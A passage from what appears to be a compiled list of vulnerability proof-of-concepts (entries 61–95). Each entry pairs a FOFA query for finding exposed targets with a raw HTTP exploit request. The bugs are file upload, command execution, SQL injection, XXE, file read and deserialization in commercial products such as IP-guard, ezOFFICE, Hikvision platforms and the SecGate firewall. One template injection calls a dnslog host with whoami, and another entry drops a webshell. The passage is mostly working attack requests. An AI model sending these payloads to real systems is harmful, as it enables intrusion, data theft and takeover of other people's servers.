Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, which the exportexcelbysql action executes.

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

The filename query parameter names the file that is written and the POST body is its content.

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter reaches a shell command; the injected ||echo ... > file writes a marker file next to view.php. Then request it:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

A response carrying the contents of config.ini (one directory above the download root) confirms the issue.

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based check: a response delayed by about 5 seconds confirms the injection.

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456/123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42-43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 selected by the UNION payload), the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Note the ;.js suffix appended to the JSP path as a path parameter (a static-resource extension); a response delayed by about 5 seconds confirms the injection.

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Same ;.js path-parameter suffix and 5-second time-based check as entry 68.

70. 万户 ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header is base64 for type C:\Windows\win.ini, the command executed by the omitted __VIEWSTATE payload.

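Several entries above hide what they do behind an encoding: entry 60 carries its query base64-encoded in sql=, entry 70 carries its command base64-encoded in the SID header, entries 58 and 66 prove injection by echoing the MD5 of a literal, and entry 88 (below) URL-encodes a newline into a query parameter. The helper below is an added example for triaging such requests; it is not part of the original compilation. It assumes only the Python standard library, and the request lines it processes are the ones printed in entries 60, 70 and 88; the response body in the test is constructed.

```python
"""Decode the encoded pieces of the POCs in this list and compute the MD5 markers
they use as proof. Added example; not part of the original compilation."""
import base64
import binascii
import hashlib
from urllib.parse import parse_qs, urlsplit

_B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def decode_b64_param(value: str) -> str:
    """Decode a base64 request parameter to text, repairing stripped '=' padding."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded, validate=True).decode("utf-8")


def maybe_b64(value: str):
    """Return the decoded text when `value` is base64 that yields printable text, else None.
    Short or non-alphabet values (ordinary words, paths) are rejected up front."""
    if len(value) < 8 or not set(value) <= _B64_CHARS:
        return None
    try:
        text = decode_b64_param(value)
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text.isprintable() else None


def md5_marker(literal: str) -> str:
    """Hex MD5 of a literal: what HashBytes('MD5', '<literal>') yields inside the injected query."""
    return hashlib.md5(literal.encode()).hexdigest()


def marker_in_response(body: str, literal: str) -> bool:
    """True when the response echoes the marker. SQL Server renders it as 0x<HEX>,
    so the comparison is case-insensitive."""
    return md5_marker(literal) in body.lower()


def decode_request_line(request_line: str) -> dict:
    """Split 'METHOD /path?query HTTP/1.1' into its path and URL-decoded parameters.
    Each parameter value is paired with its base64 decoding when it has one."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        params[name] = [{"value": v, "base64": maybe_b64(v)} for v in values]
    return {"method": method, "path": parts.path, "params": params}


if __name__ == "__main__":
    # Request lines from entries 60 and 88; SID header from entry 70; marker literal from entry 58.
    for line in (
        "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1",
        "GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27x%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1",
    ):
        print(decode_request_line(line))
    print(decode_b64_param("dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk="))
    print(md5_marker("123456"))
```

marker_in_response is the check to run on the body returned by the entry 58 and 66 requests; decode_request_line shows the newline that entry 88 smuggles into type= and the SQL that entry 60 smuggles into sql=.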
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

Time-based check: a response delayed by about 5 seconds confirms the injection.

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

The xmlValue parameter carries a DTD whose external entity reads file:///c:/windows/win.ini and references it in the VALUE field. Caveat: as published, the body encodes %55D%3E (UD>) where %5D%3E (]>) would close the DTD internal subset, and opens <dd ...> but closes </d>; check the XML before relying on this request.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The time parameter is evaluated by a shell; the backtick-quoted ifconfig writes its output next to the CGI. Then request it:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) 掌上校园 campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode value is rendered as a FreeMarker template; the Execute utility runs the command, which writes a marker file under the ROOT web application. Then request it:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field chooses the directory the file is written to. Then request it:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

The path parameter is passed to a shell; a vulnerable host returns the output of id.

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter is used as the output filename, and ../ moves the written file up to the web root. Then request it:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

The z2 value closes a quoted shell argument and pipes into id; a vulnerable host returns its output.

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

The command to run is supplied in the Cmd header; the JSON body (omitted) is the deserialization payload that reads it.

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

Same FreeMarker Execute pattern as entry 76; the sql field is rendered as a template. A DNS query to the dnslog host confirms execution (the trailing backtick is unbalanced as published).

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is below; the omitted PAYLOAD body drops a Godzilla (哥斯拉) webshell.

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

The accountId traversal places the written files under tomcat/webapps. Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The %0a newlines break out of the ping command and ${IFS} stands in for the space between cat and its argument; a vulnerable host returns /etc/passwd.

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter supplies the traversal and the final filename. Then request /jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.5,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline-delimited shell command: echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php. Then request /txzfsrur.php (the file the payload writes; the published list pointed at /astdfkhl.php here, which does not match the payload) and look for the marker string and the phpinfo() output.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The path encodes the p of .jsp as %70; a response containing 24642 (111*222) confirms the injection.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

The jsondata[ip] value is executed instead of being pinged; a vulnerable host returns the output of ipconfig.

91. Hikvision (海康威视) integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ..;/ segment reaches the download endpoint through a path the access control does not cover, and fileName supplies the traversal; a vulnerable host returns /etc/passwd.

92. Hikvision (海康威视) operations management center (运行管理中心) session command execution
Fastjson deserialization command execution.
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

The command to run is supplied in the Testcmd header; the omitted JSON body is the Fastjson payload.

93. 奇安信 (QAX) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The uploaded file is served from /attachements/ under its original name. Then request it:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 (QAX) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Same upload handler and __hash__ value as entry 93, reached through a different g= action. Then request the file uploaded above (the published list repeated entry 93's filename here; the upload in this entry is cciytdzu.txt):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
